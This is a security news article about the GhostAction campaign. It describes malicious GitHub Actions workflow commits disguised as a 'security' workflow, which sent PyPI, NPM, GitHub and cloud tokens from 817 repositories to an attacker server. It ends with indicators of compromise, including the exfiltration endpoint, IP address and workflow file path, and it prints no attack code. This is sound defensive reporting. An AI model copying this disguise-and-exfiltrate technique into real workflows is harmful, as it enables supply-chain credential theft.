New GhostAction Attack Compromises 327 GitHub Users and 817 Repositories

Cybersecurity

Security researchers have identified a significant attack campaign, termed GhostAction, which compromised the secrets of 327 GitHub users, affecting 817 repositories.

The attack was discovered through a malicious workflow in the FastUUID project.

GitGuardian detected a suspicious GitHub workflow commit titled “Add Github Actions Security workflow,” initiated by the account Grommash9 on Sat, Sep 2, 2025.

This workflow was designed to exfiltrate sensitive secrets, such as API tokens, to an attacker-controlled server.

FastUUID as the Entry Point

The malicious file extracted the PyPI API token from the repository’s environment variables, sending it to an external server.

No evidence of malicious releases was found during the compromise window, despite potential tampering with the FastUUID package on PyPI.

GitGuardian promptly alerted PyPI, which placed the project in read-only mode, and the compromised maintainer reversed the malicious commit.

The swift response minimized the impact on FastUUID and its dependent projects, such as BerriAI/litellm.

Further investigation revealed similar malicious commits across multiple repositories. Each targeted workflow attempted to exfiltrate various secrets, including GitHub tokens, DockerHub credentials, Cloudflare API tokens, and NPM access keys.

In total, 3,325 leaked secrets were identified across the campaign. Compromised NPM and PyPI tokens pose a significant supply chain security risk, potentially allowing attackers to publish malicious packages under trusted names.

The stolen data was consistently sent to the server at https://bold-dhawan.45-139-104-115.plesk.page, hosted under 493networking.cc. This infrastructure ceased responses by the evening of Tue, Sep 5, 2025, possibly indicating shutdown by the attacker.

Of the 817 impacted repositories, 100 quickly reverted the changes, while GitGuardian alerted maintainers in another 573 projects.

Some repositories were deleted or had issues disabled, limiting notification capabilities.

Affected developers reported unauthorized use of AWS keys and database credentials. Several companies experienced portfolio-wide compromises across languages such as Python, Rust, JavaScript, and Go.

GitGuardian disclosed findings to GitHub, PyPI, and NPM on Tue, Sep 5, 2025. Currently, 9 NPM packages and 15 PyPI projects remain at risk if compromised tokens are used for malicious updates.

The GhostAction campaign is a significant compromise of the developer ecosystem, underscoring the need for monitoring workflows, securing CI/CD secrets, and rapid incident response.

Indicators of Compromise (IOCs)

Network Indicators:

• Malicious Endpoint: https://bold-dhawan.45-139-104-115.plesk.page
• IP Address: 45.139.104.115
• HTTP Method: POST requests with secret data

GitHub Workflow Indicators:

• Malicious Workflow Name: Github Actions Security
• File Path: .github/workflows/github_actions_security.yml
• Commit Messages: “Add Github Actions Security workflow”